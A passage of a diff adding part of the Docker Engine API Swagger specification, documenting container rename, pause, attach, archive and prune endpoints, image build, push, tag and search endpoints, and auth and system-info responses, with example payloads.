Memory: 314572800 + MemorySwap: 514288000 + MemoryReservation: 209715200 + KernelMemory: 52428800 + RestartPolicy: + MaximumRetryCount: 4 + Name: "on-failure" + tags: ["Container"] + /containers/{id}/rename: + post: + summary: "Rename a container" + operationId: "ContainerRename" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 409: + description: "name already in use" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "name" + in: "query" + required: true + description: "New name for the container" + type: "string" + tags: ["Container"] + /containers/{id}/pause: + post: + summary: "Pause a container" + description: | + Use the cgroups freezer to suspend all processes in a container. + + Traditionally, when suspending a process the `SIGSTOP` signal is used, which is observable by the process being suspended. With the cgroups freezer the process is unaware, and unable to capture, that it is being suspended, and subsequently resumed. + operationId: "ContainerPause" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/unpause: + post: + summary: "Unpause a container" + description: "Resume a container which has been paused." + operationId: "ContainerUnpause" + responses: + 204: + description: "no error" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}/attach: + post: + summary: "Attach to a container" + description: | + Attach to a container to read its output or send it input. You can attach to the same container multiple times and you can reattach to containers that have been detached. + + Either the `stream` or `logs` parameter must be `true` for this endpoint to do anything. + + See [the documentation for the `docker attach` command](https://docs.docker.com/engine/reference/commandline/attach/) for more details. + + ### Hijacking + + This endpoint hijacks the HTTP connection to transport `stdin`, `stdout`, and `stderr` on the same socket. + + This is the response from the daemon for an attach request: + + ``` + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + [STREAM] + ``` + + After the headers and two new lines, the TCP connection can now be used for raw, bidirectional communication between the client and server. + + To hint potential proxies about connection hijacking, the Docker client can also optionally send connection upgrade headers. + + For example, the client sends this request to upgrade the connection: + + ``` + POST /containers/16253994b7c4/attach?stream=1&stdout=1 HTTP/1.1 + Upgrade: tcp + Connection: Upgrade + ``` + + The Docker daemon will respond with a `101 UPGRADED` response, and will similarly follow with the raw stream: + + ``` + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + [STREAM] + ``` + + ### Stream format + + When the TTY setting is disabled in [`POST /containers/create`](#operation/ContainerCreate), the stream over the hijacked connected is multiplexed to separate out `stdout` and `stderr`. The stream consists of a series of frames, each containing a header and a payload. + + The header contains the information which the stream writes (`stdout` or `stderr`). It also contains the size of the associated frame encoded in the last four bytes (`uint32`). + + It is encoded on the first eight bytes like this: + + ```go + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + ``` + + `STREAM_TYPE` can be: + + - 0: `stdin` (is written on `stdout`) + - 1: `stdout` + - 2: `stderr` + + `SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of the `uint32` size encoded as big endian. + + Following the header is the payload, which is the specified number of bytes of `STREAM_TYPE`. + + The simplest way to implement this protocol is the following: + + 1. Read 8 bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + + ### Stream format when using a TTY + + When the TTY setting is enabled in [`POST /containers/create`](#operation/ContainerCreate), the stream is not multiplexed. The data exchanged over the hijacked connection is simply the raw data from the process PTY and client's `stdin`. + + operationId: "ContainerAttach" + produces: + - "application/vnd.docker.raw-stream" + responses: + 101: + description: "no error, hints proxy about hijacking" + 200: + description: "no error, no upgrade header found" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "detachKeys" + in: "query" + description: "Override the key sequence for detaching a container.Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`." + type: "string" + - name: "logs" + in: "query" + description: | + Replay previous logs from the container. + + This is useful for attaching to a container that has started and you want to output everything since the container started. + + If `stream` is also enabled, once all the previous output has been returned, it will seamlessly transition into streaming current output. + type: "boolean" + default: false + - name: "stream" + in: "query" + description: "Stream attached streams from the the time the request was made onwards" + type: "boolean" + default: false + - name: "stdin" + in: "query" + description: "Attach to `stdin`" + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Attach to `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Attach to `stderr`" + type: "boolean" + default: false + tags: ["Container"] + /containers/{id}/attach/ws: + get: + summary: "Attach to a container via a websocket" + operationId: "ContainerAttachWebsocket" + responses: + 101: + description: "no error, hints proxy about hijacking" + 200: + description: "no error, no upgrade header found" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "detachKeys" + in: "query" + description: "Override the key sequence for detaching a container.Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,`, or `_`." + type: "string" + - name: "logs" + in: "query" + description: "Return logs" + type: "boolean" + default: false + - name: "stream" + in: "query" + description: "Return stream" + type: "boolean" + default: false + - name: "stdin" + in: "query" + description: "Attach to `stdin`" + type: "boolean" + default: false + - name: "stdout" + in: "query" + description: "Attach to `stdout`" + type: "boolean" + default: false + - name: "stderr" + in: "query" + description: "Attach to `stderr`" + type: "boolean" + default: false + tags: ["Container"] + /containers/{id}/wait: + post: + summary: "Wait for a container" + description: "Block until a container stops, then returns the exit code." + operationId: "ContainerWait" + produces: ["application/json"] + responses: + 200: + description: "The container has exit." + schema: + type: "object" + required: [StatusCode] + properties: + StatusCode: + description: "Exit code of the container" + type: "integer" + x-nullable: false + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + tags: ["Container"] + /containers/{id}: + delete: + summary: "Remove a container" + operationId: "ContainerDelete" + responses: + 204: + description: "no error" + 400: + description: "bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "v" + in: "query" + description: "Remove the volumes associated with the container." + type: "boolean" + default: false + - name: "force" + in: "query" + description: "If the container is running, kill it before removing it." + type: "boolean" + default: false + tags: ["Container"] + /containers/{id}/archive: + head: + summary: "Get information about files in a container" + description: "A response header `X-Docker-Container-Path-Stat` is return containing a base64 - encoded JSON object with some filesystem header information about the path." + operationId: "ContainerArchiveHead" + responses: + 200: + description: "no error" + headers: + X-Docker-Container-Path-Stat: + type: "string" + description: "TODO" + 400: + description: "Bad parameter" + schema: + allOf: + - $ref: "#/definitions/ErrorResponse" + - type: "object" + properties: + message: + description: "The error message. Either \"must specify path parameter\" (path cannot be empty) or \"not a directory\" (path was asserted to be a directory but exists as a file)." + type: "string" + x-nullable: false + 404: + description: "Container or path does not exist" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "path" + in: "query" + required: true + description: "Resource in the container’s filesystem to archive." + type: "string" + tags: ["Container"] + get: + summary: "Get an archive of a filesystem resource in a container" + description: "Get an tar archive of a resource in the filesystem of container id." + operationId: "ContainerGetArchive" + produces: + - "application/x-tar" + responses: + 200: + description: "no error" + 400: + description: "Bad parameter" + schema: + allOf: + - $ref: "#/definitions/ErrorResponse" + - type: "object" + properties: + message: + description: "The error message. Either \"must specify path parameter\" (path cannot be empty) or \"not a directory\" (path was asserted to be a directory but exists as a file)." + type: "string" + x-nullable: false + 404: + description: "Container or path does not exist" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "path" + in: "query" + required: true + description: "Resource in the container’s filesystem to archive." + type: "string" + tags: ["Container"] + put: + summary: "Extract an archive of files or folders to a directory in a container" + description: "Upload a tar archive to be extracted to a path in the filesystem of container id." + operationId: "ContainerPutArchive" + consumes: + - "application/x-tar" + - "application/octet-stream" + responses: + 200: + description: "The content was extracted successfully" + 400: + description: "Bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 403: + description: "Permission denied, the volume or container rootfs is marked as read-only." + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "No such container or path does not exist inside the container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + required: true + description: "ID or name of the container" + type: "string" + - name: "path" + in: "query" + required: true + description: "Path to a directory in the container to extract the archive’s contents into. " + type: "string" + - name: "noOverwriteDirNonDir" + in: "query" + description: "If “1”, “true”, or “True” then it will be an error if unpacking the given content would cause an existing directory to be replaced with a non-directory and vice versa." + type: "string" + - name: "inputStream" + in: "body" + required: true + description: "The input stream must be a tar archive compressed with one of the following algorithms: identity (no compression), gzip, bzip2, xz." + schema: + type: "string" + tags: ["Container"] + /containers/prune: + post: + summary: "Delete stopped containers" + produces: + - "application/json" + operationId: "ContainerPrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). + + Available filters: + type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + ContainersDeleted: + description: "Container IDs that were deleted" + type: "array" + items: + type: "string" + SpaceReclaimed: + description: "Disk space reclaimed in bytes" + type: "integer" + format: "int64" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Container"] + /images/json: + get: + summary: "List Images" + description: "Returns a list of images on the server. Note that it uses a different, smaller representation of an image than inspecting a single image." + operationId: "ImageList" + produces: + - "application/json" + responses: + 200: + description: "Summary image data for the images matching the query" + schema: + type: "array" + items: + $ref: "#/definitions/ImageSummary" + examples: + application/json: + - Id: "sha256:e216a057b1cb1efc11f8a268f37ef62083e70b1b38323ba252e25ac88904a7e8" + ParentId: "" + RepoTags: + - "ubuntu:12.04" + - "ubuntu:precise" + RepoDigests: + - "ubuntu@sha256:992069aee4016783df6345315302fa59681aae51a8eeb2f889dea59290f21787" + Created: 1474925151 + Size: 103579269 + VirtualSize: 103579269 + SharedSize: 0 + Labels: {} + Containers: 2 + - Id: "sha256:3e314f95dcace0f5e4fd37b10862fe8398e3c60ed36600bc0ca5fda78b087175" + ParentId: "" + RepoTags: + - "ubuntu:12.10" + - "ubuntu:quantal" + RepoDigests: + - "ubuntu@sha256:002fba3e3255af10be97ea26e476692a7ebed0bb074a9ab960b2e7a1526b15d7" + - "ubuntu@sha256:68ea0200f0b90df725d99d823905b04cf844f6039ef60c60bf3e019915017bd3" + Created: 1403128455 + Size: 172064416 + VirtualSize: 172064416 + SharedSize: 0 + Labels: {} + Containers: 5 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "all" + in: "query" + description: "Show all images. Only images from a final layer (no children) are shown by default." + type: "boolean" + default: false + - name: "filters" + in: "query" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the images list. + + Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label + - `before`=(`[:]`, `` or ``) + - `since`=(`[:]`, `` or ``) + - `reference`=(`[:]`) + type: "string" + - name: "digests" + in: "query" + description: "Show digest information as a `RepoDigests` field on each image." + type: "boolean" + default: false + tags: ["Image"] + /build: + post: + summary: "Build an image" + description: | + Build an image from a tar archive with a `Dockerfile` in it. + + The `Dockerfile` specifies how the image is built from the tar archive. It is typically in the archive's root, but can be at a different path or have a different name by specifying the `dockerfile` parameter. [See the `Dockerfile` reference for more information](https://docs.docker.com/engine/reference/builder/). + + The Docker daemon performs a preliminary validation of the `Dockerfile` before starting the build, and returns an error if the syntax is incorrect. After that, each instruction is run one-by-one until the ID of the new image is output. + + The build is canceled if the client drops the connection by quitting or being killed. + operationId: "ImageBuild" + consumes: + - "application/octet-stream" + produces: + - "application/json" + parameters: + - name: "inputStream" + in: "body" + description: "A tar archive compressed with one of the following algorithms: identity (no compression), gzip, bzip2, xz." + schema: + type: "string" + format: "binary" + - name: "dockerfile" + in: "query" + description: "Path within the build context to the `Dockerfile`. This is ignored if `remote` is specified and points to an external `Dockerfile`." + type: "string" + default: "Dockerfile" + - name: "t" + in: "query" + description: "A name and optional tag to apply to the image in the `name:tag` format. If you omit the tag the default `latest` value is assumed. You can provide several `t` parameters." + type: "string" + - name: "remote" + in: "query" + description: "A Git repository URI or HTTP/HTTPS context URI. If the URI points to a single text file, the file’s contents are placed into a file called `Dockerfile` and the image is built from that file. If the URI points to a tarball, the file is downloaded by the daemon and the contents therein used as the context for the build. If the URI points to a tarball and the `dockerfile` parameter is also specified, there must be a file with the corresponding path inside the tarball." + type: "string" + - name: "q" + in: "query" + description: "Suppress verbose build output." + type: "boolean" + default: false + - name: "nocache" + in: "query" + description: "Do not use the cache when building the image." + type: "boolean" + default: false + - name: "cachefrom" + in: "query" + description: "JSON array of images used for build cache resolution." + type: "string" + - name: "pull" + in: "query" + description: "Attempt to pull the image even if an older image exists locally." + type: "string" + - name: "rm" + in: "query" + description: "Remove intermediate containers after a successful build." + type: "boolean" + default: true + - name: "forcerm" + in: "query" + description: "Always remove intermediate containers, even upon failure." + type: "boolean" + default: false + - name: "memory" + in: "query" + description: "Set memory limit for build." + type: "integer" + - name: "memswap" + in: "query" + description: "Total memory (memory + swap). Set as `-1` to disable swap." + type: "integer" + - name: "cpushares" + in: "query" + description: "CPU shares (relative weight)." + type: "integer" + - name: "cpusetcpus" + in: "query" + description: "CPUs in which to allow execution (e.g., `0-3`, `0,1`)." + type: "string" + - name: "cpuperiod" + in: "query" + description: "The length of a CPU period in microseconds." + type: "integer" + - name: "cpuquota" + in: "query" + description: "Microseconds of CPU time that the container can get in a CPU period." + type: "integer" + - name: "buildargs" + in: "query" + description: "JSON map of string pairs for build-time variables. Users pass these values at build-time. Docker uses the buildargs as the environment context for commands run via the `Dockerfile` RUN instruction, or for variable expansion in other `Dockerfile` instructions. This is not meant for passing secret values. [Read more about the buildargs instruction.](https://docs.docker.com/engine/reference/builder/#arg)" + type: "integer" + - name: "shmsize" + in: "query" + description: "Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB." + type: "integer" + - name: "squash" + in: "query" + description: "Squash the resulting images layers into a single layer. *(Experimental release only.)*" + type: "boolean" + - name: "labels" + in: "query" + description: "Arbitrary key/value labels to set on the image, as a JSON map of string pairs." + type: "string" + - name: "networkmode" + in: "query" + description: "Sets the networking mode for the run commands during + build. Supported standard values are: `bridge`, `host`, `none`, and + `container:`. Any other value is taken as a custom network's + name to which this container should connect to." + type: "string" + - name: "Content-type" + in: "header" + type: "string" + enum: + - "application/tar" + default: "application/tar" + - name: "X-Registry-Config" + in: "header" + description: | + This is a base64-encoded JSON object with auth configurations for multiple registries that a build may refer to. + + The key is a registry URL, and the value is an auth configuration object, [as described in the authentication section](#section/Authentication). For example: + + ``` + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + ``` + + Only the registry domain name (and port if not the default 443) are required. However, for legacy reasons, the Docker Hub registry must be specified with both a `https://` prefix and a `/v1/` suffix even though Docker will prefer to use the v2 registry API. + type: "string" + responses: + 200: + description: "no error" + 400: + description: "Bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Image"] + /images/create: + post: + summary: "Create an image" + description: "Create an image by either pulling it from a registry or importing it." + operationId: "ImageCreate" + consumes: + - "text/plain" + - "application/octet-stream" + produces: + - "application/json" + responses: + 200: + description: "no error" + 404: + description: "repository does not exist or no read access" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "fromImage" + in: "query" + description: "Name of the image to pull. The name may include a tag or digest. This parameter may only be used when pulling an image. The pull is cancelled if the HTTP connection is closed." + type: "string" + - name: "fromSrc" + in: "query" + description: "Source to import. The value may be a URL from which the image can be retrieved or `-` to read the image from the request body. This parameter may only be used when importing an image." + type: "string" + - name: "repo" + in: "query" + description: "Repository name given to an image when it is imported. The repo may include a tag. This parameter may only be used when importing an image." + type: "string" + - name: "tag" + in: "query" + description: "Tag or digest. If empty when pulling an image, this causes all tags for the given image to be pulled." + type: "string" + - name: "inputImage" + in: "body" + description: "Image content if the value `-` has been specified in fromSrc query parameter" + schema: + type: "string" + required: false + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration. [See the authentication section for details.](#section/Authentication)" + type: "string" + tags: ["Image"] + /images/{name}/json: + get: + summary: "Inspect an image" + description: "Return low-level information about an image." + operationId: "ImageInspect" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + $ref: "#/definitions/Image" + examples: + application/json: + Id: "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c" + Container: "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a" + Comment: "" + Os: "linux" + Architecture: "amd64" + Parent: "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c" + ContainerConfig: + Tty: false + Hostname: "e611e15f9c9d" + Domainname: "" + AttachStdout: false + PublishService: "" + AttachStdin: false + OpenStdin: false + StdinOnce: false + NetworkDisabled: false + OnBuild: [] + Image: "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c" + User: "" + WorkingDir: "" + MacAddress: "" + AttachStderr: false + Labels: + com.example.license: "GPL" + com.example.version: "1.0" + com.example.vendor: "Acme" + Env: + - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + Cmd: + - "/bin/sh" + - "-c" + - "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + DockerVersion: "1.9.0-dev" + VirtualSize: 188359297 + Size: 0 + Author: "" + Created: "2015-09-10T08:30:53.26995814Z" + GraphDriver: + Name: "aufs" + RepoDigests: + - "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + RepoTags: + - "example:1.0" + - "example:latest" + - "example:stable" + Config: + Image: "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c" + NetworkDisabled: false + OnBuild: [] + StdinOnce: false + PublishService: "" + AttachStdin: false + OpenStdin: false + Domainname: "" + AttachStdout: false + Tty: false + Hostname: "e611e15f9c9d" + Cmd: + - "/bin/bash" + Env: + - "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + Labels: + com.example.vendor: "Acme" + com.example.version: "1.0" + com.example.license: "GPL" + MacAddress: "" + AttachStderr: false + WorkingDir: "" + User: "" + RootFS: + Type: "layers" + Layers: + - "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6" + - "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such image: someimage (tag: latest)" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or id" + type: "string" + required: true + tags: ["Image"] + /images/{name}/history: + get: + summary: "Get the history of an image" + description: "Return parent layers of an image." + operationId: "ImageHistory" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + type: "object" + properties: + Id: + type: "string" + Created: + type: "integer" + format: "int64" + CreatedBy: + type: "string" + Tags: + type: "array" + items: + type: "string" + Size: + type: "integer" + format: "int64" + Comment: + type: "string" + examples: + application/json: + - Id: "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710" + Created: 1398108230 + CreatedBy: "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /" + Tags: + - "ubuntu:lucid" + - "ubuntu:10.04" + Size: 182964289 + Comment: "" + - Id: "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8" + Created: 1398108222 + CreatedBy: "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/" + Tags: [] + Size: 0 + Comment: "" + - Id: "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158" + Created: 1371157430 + CreatedBy: "" + Tags: + - "scratch12:latest" + - "scratch:latest" + Size: 0 + Comment: "Imported from -" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID" + type: "string" + required: true + tags: ["Image"] + /images/{name}/push: + post: + summary: "Push an image" + description: | + Push an image to a registry. + + If you wish to push an image on to a private registry, that image must already have a tag which references the registry. For example, `registry.example.com/myimage:latest`. + + The push is cancelled if the HTTP connection is closed. + operationId: "ImagePush" + consumes: + - "application/octet-stream" + responses: + 200: + description: "No error" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID." + type: "string" + required: true + - name: "tag" + in: "query" + description: "The tag to associate with the image on the registry." + type: "string" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration. [See the authentication section for details.](#section/Authentication)" + type: "string" + required: true + tags: ["Image"] + /images/{name}/tag: + post: + summary: "Tag an image" + description: "Tag an image so that it becomes part of a repository." + operationId: "ImageTag" + responses: + 201: + description: "No error" + 400: + description: "Bad parameter" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Conflict" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID to tag." + type: "string" + required: true + - name: "repo" + in: "query" + description: "The repository to tag in. For example, `someuser/someimage`." + type: "string" + - name: "tag" + in: "query" + description: "The name of the new tag." + type: "string" + tags: ["Image"] + /images/{name}: + delete: + summary: "Remove an image" + description: | + Remove an image, along with any untagged parent images that were referenced by that image. + + Images can't be removed if they have descendant images, are being used by a running container or are being used by a build. + operationId: "ImageDelete" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + $ref: "#/definitions/ImageDeleteResponse" + examples: + application/json: + - Untagged: "3e2f21a89f" + - Deleted: "3e2f21a89f" + - Deleted: "53b4f83ac9" + 404: + description: "No such image" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Conflict" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID" + type: "string" + required: true + - name: "force" + in: "query" + description: "Remove the image even if it is being used by stopped containers or has other tags" + type: "boolean" + default: false + - name: "noprune" + in: "query" + description: "Do not delete untagged parent images" + type: "boolean" + default: false + tags: ["Image"] + /images/search: + get: + summary: "Search images" + description: "Search for an image on Docker Hub." + operationId: "ImageSearch" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + type: "object" + properties: + description: + type: "string" + is_official: + type: "boolean" + is_automated: + type: "boolean" + name: + type: "string" + star_count: + type: "integer" + examples: + application/json: + - description: "" + is_official: false + is_automated: false + name: "wma55/u1210sshd" + star_count: 0 + - description: "" + is_official: false + is_automated: false + name: "jdswinbank/sshd" + star_count: 0 + - description: "" + is_official: false + is_automated: false + name: "vgauthier/sshd" + star_count: 0 + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "term" + in: "query" + description: "Term to search" + type: "string" + required: true + - name: "limit" + in: "query" + description: "Maximum number of results to return" + type: "integer" + - name: "filters" + in: "query" + description: | + A JSON encoded value of the filters (a `map[string][]string`) to process on the images list. Available filters: + + - `stars=` + - `is-automated=(true|false)` + - `is-official=(true|false)` + type: "string" + tags: ["Image"] + /images/prune: + post: + summary: "Delete unused images" + produces: + - "application/json" + operationId: "ImagePrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). + + Available filters: + - `dangling=` When set to `true` (or `1`), prune only + unused *and* untagged images. When set to `false` + (or `0`), all unused images are pruned. + type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + ImagesDeleted: + description: "Images that were deleted" + type: "array" + items: + $ref: "#/definitions/ImageDeleteResponse" + SpaceReclaimed: + description: "Disk space reclaimed in bytes" + type: "integer" + format: "int64" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Image"] + /auth: + post: + summary: "Check auth configuration" + description: "Validate credentials for a registry and, if available, get an identity token for accessing the registry without password." + operationId: "SystemAuth" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 200: + description: "An identity token was generated successfully." + schema: + type: "object" + required: [Status] + properties: + Status: + description: "The status of the authentication" + type: "string" + x-nullable: false + IdentityToken: + description: "An opaque token used to authenticate a user after a successful login" + type: "string" + x-nullable: false + examples: + application/json: + Status: "Login Succeeded" + IdentityToken: "9cbaf023786cd7..." + 204: + description: "No error" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "authConfig" + in: "body" + description: "Authentication to check" + schema: + $ref: "#/definitions/AuthConfig" + tags: ["System"] + /info: + get: + summary: "Get system information" + operationId: "SystemInfo" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + Architecture: + type: "string" + Containers: + type: "integer" + ContainersRunning: + type: "integer" + ContainersStopped: + type: "integer" + ContainersPaused: + type: "integer" + CpuCfsPeriod: + type: "boolean" + CpuCfsQuota: + type: "boolean" + Debug: + type: "boolean" + DiscoveryBackend: + type: "string" + DockerRootDir: + type: "string" + Driver: + type: "string" + DriverStatus: + type: "array" + items: + type: "array" + items: + type: "string" + SystemStatus: + type: "array" + items: + type: "array" + items: + type: "string" + Plugins: + type: "object" + properties: + Volume: + type: "array" + items: + type: "string" + Network: + type: "array" + items: + type: "string" + ExperimentalBuild: + type: "boolean" + HttpProxy: + type: "string" + HttpsProxy: + type: "string" + ID: + type: "string" + IPv4Forwarding: + type: "boolean" + Images: + type: "integer" + IndexServerAddress: + type: "string" + InitPath: + type: "string" + InitSha1: + type: "string" + KernelVersion: + type: "string" + Labels: + type: "array" + items: + type: "string" + MemTotal: + type: "integer" + MemoryLimit: + type: "boolean" + NCPU: + type: "integer" + NEventsListener: + type: "integer" + NFd: + type: "integer" + NGoroutines: + type: "integer" + Name: + type: "string" + NoProxy: + type: "string" + OomKillDisable: + type: "boolean" + OSType: + type: "string" + OomScoreAdj: + type: "integer" + OperatingSystem: + type: "string" + RegistryConfig: + type: "object" + properties: + IndexConfigs: + type: "object" + additionalProperties: + type: "object" + properties: + Mirrors: + type: "array" + items: + type: "string" + Name: + type: "string" + Official: + type: "boolean" + Secure: + type: "boolean" + InsecureRegistryCIDRs: + type: "array" + items: + type: "string" + SwapLimit: + type: "boolean" + SystemTime: + type: "string" + ServerVersion: + type: "string" + examples: + application/json: + Architecture: "x86_64" + ClusterStore: "etcd://localhost:2379" + CgroupDriver: "cgroupfs" + Containers: 11 + ContainersRunning: 7 + ContainersStopped: 3 + ContainersPaused: 1 + CpuCfsPeriod: true + CpuCfsQuota: true + Debug: false + DockerRootDir: "/var/lib/docker" + Driver: "btrfs" + DriverStatus: + - + - "" + ExperimentalBuild: false + HttpProxy: "http://test:test@localhost:8080" + HttpsProxy: "https://test:test@localhost:8080" + ID: "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS" + 